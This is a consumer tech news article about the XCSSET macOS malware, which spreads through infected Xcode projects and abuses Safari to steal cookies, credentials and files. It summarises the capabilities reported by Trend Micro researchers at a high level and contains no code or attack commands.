Third macOS Zero-Day Attack Takes Advantage through Safari

Macos Zero Day Attack Featured

There was a time when Macs were considered safe from malware and other ills. Attackers preferred to go after Windows users simply because there were more of them – attackers could get more bang for their buck. That’s been changing, however, with more people owning Macs. This has led to a third zero-day attack on macOS in less than a year, allowing attackers to take advantage in several ways through Safari.

Discovery of Third macOS Zero-Day Attack

Last August, security experts found XCSSET, a zero-day attack that affected Mac developers. It gave them access to browser cookies and files. It also left behind website backdoors and made off with information from applications while leaving behind a ransom note. This past March, SentinelOne researchers discovered a library of Trojan code that installed the XCSSET malware on developer Macs.

A third instance of XCSSET has been discovered by Trend Micro researchers. In these two zero-day attacks on macOS, one takes advantage of a flaw to steal cookies, and the other takes advantage of a developer edition of Safari. The researchers found the attacks to be “quite unusual.”

Macos Zero Day Attack Malware

“Malicious code is injected into local Xcode projects so that when the project is built, the malicious code is run. This poses a risk for Xcode developers in particular. The threat escalates since we have identified affected developers who shared their projects on GitHub, leading to a supply-chain-like attack for users who rely on these repositories as dependencies in their own projects,” reads a blog post on the Trend Micro website. The researchers believe the attacks could be widespread, as the malware was also identified on VirusTotal sources.

The researchers detected the entry threat as “TrojanSpy.MacOS.XCSSET.A and its command and control (C&C) related files as Backdoor.MacOS.XCSSET.A.”

The Harm that XCSSET Causes

X code projects and modified apps are created from the malware and spread the attack. What isn’t known is how the malware reaches these Macs. What is known is that the X code projects have been modified to run malicious code, which reaches the Macs, leading user credentials and other information to be stolen.

Once it lands on a system, XCSSET can:

  • Abuse Safari and other browsers
  • Read and dump Safari cookies
  • Inject backdoors on the Safari development version through a UXSS attack
  • Steal information from apps
  • Take screenshots
  • Upload user files to the attacker’s server
  • Encrypt files
  • Show a ransom note
Macos Zero Day Attack Laptop

A UXSS attack affects browsing primarily. It can:

  • Modify websites
  • Modify/replace Bitcoin and cryptocurrency addresses
  • Steal account credentials
  • Steal Apple Store credit card information
  • Block the user from changing passwords while stealing modified passwords
  • Take screenshots

With three occurrences of the Mac zero-day attack in less than a year, there’s no telling where and when it will hit next. Trend Micro suggests users only download apps from official, legitimate sources and use a multilayer security solution.

Read on to learn some ugly truths about zero-day exploits and whether Windows Defender is good enough in 2021.

Laura Tucker Laura Tucker

Laura has spent nearly 20 years writing news, reviews, and op-eds, with more than 10 of those years as an editor as well. She has exclusively used Apple products for the past three decades. In addition to writing and editing at MTE, she also runs the site's sponsored review program.

Leave a Comment

Yeah! You've decided to leave a comment. That's fantastic! Check out our comment policy here. Let's have a personal and meaningful conversation.